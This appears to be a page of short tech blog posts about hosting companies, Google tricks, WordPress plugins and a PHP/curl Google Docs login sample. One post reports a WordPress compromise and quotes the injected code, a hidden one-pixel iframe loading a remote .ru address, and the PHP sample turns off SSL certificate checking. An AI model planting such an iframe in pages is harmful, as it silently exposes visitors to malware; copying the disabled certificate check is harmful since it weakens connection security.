Big Hosting Companies

Here’s a list of some of the biggest and most prominent hosting companies on the web:

123-reg.co.uk
1and1
4d Web Hosting
BT broadband office
dnsExit
DNS Park
Domain Explorer
DomainSite
DreamHost
Dynadot
DynDNS
Enom
EveryDNS.net
Gandi.net
GoDaddy
iCodia
iPowerWeb
ix Web Hosting
Lxlabs
Name.com
Name.net
Namesecure
NearlyFreeSpeech
Netfirms
Network Solutions
No-IP
Registerfly.com
vserver.de
Webhost4Life
WHM
XName
Yahoo!
ZoneEdit

Posted in Web Development | Tagged | Leave a comment

Facebook: Fan Pages vs Groups in 141 characters

The key differentiator is that fan pages build brands and groups maintain a community to connect. That’s why the groups aren’t as flashy yet.

via kelleyob

Posted in Social Media, Tech Tips | Leave a comment

Google QR code on goo.gl

Here’s a new trick that hasn’t been blogged yet! Google’s url shortener at goo.gl can generate QR codes (which are 2D barcodes) just by appending “.qr” after the goo.gl url. So the url http://goo.gl/727X does a redirect to http://www.mattcutts.com/blog/ and the url http://goo.gl/727X.qr will generate a QR code that also goes to http://www.mattcutts.com/blog/ . Pretty cool, huh? Please share this trick widely. :)

Via Buzz

Posted in Social Media, Tech Tips, Web Development | Tagged , , , | Leave a comment

sadeferxaa

I’m getting errors in my log file with “sadeferxaa” in the url request:

IP: 92.243.84.187
Page Requested: /index.php?page=sadeferxaa
Browser Signature: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)

WordPress was also compromised with the following data injected at the end of some files:

<html><body><iframe src=”http://eftpsid0342943.ru/contacts/s3″ width=1 height=1></iframe></body></html>

I’m trying to track down the source of the compromise, please comment if you have a similar experience with this.

Posted in Tech Tips | Tagged | 3 Comments

a Facelift for Statcounter?

Looks like the good folks at stat counter are working to put a new face on their site. The current site is very usable and doesn’t seem to have any real problems, but there are a lot of little things they could do (sortable tables, extra options, an API :hint, hint:) that would make it a lot cooler. Take a look at the features they are planning to implement, and maybe leave some feedback for them, too.

Posted in Web Development | Leave a comment

Dropbox Introduces Selective Sync

Everyone has been waiting for drop box to introduce selective sync. Selective Sync allows you to choose which folders to sync locally and which to leave on the server. They finally have in their latest BETA version! Learn how to get this version and how to use selective sync over at Groovy Post’s blog.

Posted in Tech Tips | Tagged | Leave a comment

Google Docs API: Client Login with PHP and Curl

Just found a really great article / example about using PHP/Curl to access the google docs API:

Google Docs API: Client Login with PHP and Curl

Here is a code sample:


	// Construct an HTTP POST request
	$clientlogin_url = "https://www.google.com/accounts/ClientLogin";
	$clientlogin_post = array(
	    "accountType" => "HOSTED_OR_GOOGLE",
	    "Email" => "[email protected]",
	    "Passwd" => "yourgooglepassword",
	    "service" => "writely",
	    "source" => "your application name"
	);

	// Initialize the curl object
	$curl = curl_init($clientlogin_url);

	// Set some options (some for SHTTP)
	curl_setopt($curl, CURLOPT_POST, true);
	curl_setopt($curl, CURLOPT_POSTFIELDS, $clientlogin_post);
	curl_setopt($curl, CURLOPT_HTTPAUTH, CURLAUTH_ANY);
	curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
	curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);

	// Execute
	$response = curl_exec($curl);

	// Get the Auth string and save it
	preg_match("/Auth=([a-z0-9_-]+)/i", $response, $matches);
	$auth = $matches[1];

	echo "The auth string is: " . $auth;

Posted in Web Development | Comments Off on Google Docs API: Client Login with PHP and Curl

WordPress Plugins that I have deactivated

Maybe I’ll use these again in the future some day, but it’s spring and I’m doing spring cleaning! Here are some plugins that I am deactivating and removing:

  • WP Security Scan (not that helpful)
  • Snow Storm ( too heavy on Javascript)
  • SexyBookmarks (too many warnings in the WP admin screen)
  • Lightbox Gallery (eh)
Posted in Web Development | Tagged , | Leave a comment

5 Great Image Gallery Plugins for WordPress

If you’re looking for an easy way to integrate picture galleries into wordpress, try these plugins:

  • Flickr Manager
  • Flickr Photo Album
  • NextGEN FlashViewer
  • NextGEN Gallery
  • PictoBrowser
  • Yet Another Flickr Template
Posted in Design, Web Development | Tagged | Leave a comment

Old Joomla Logo

I keep seeing this favicon in my browser and it looks like a company logo, but it’s not. I actually think this is one of Joomla’s earlier logos. I wanted to post it here for reference since googling “Joomla Old Logo” doesn’t turn up anything except their current logo. I’m not much of a Joomla fan anyway.

Posted in Design, Web Development | 2 Comments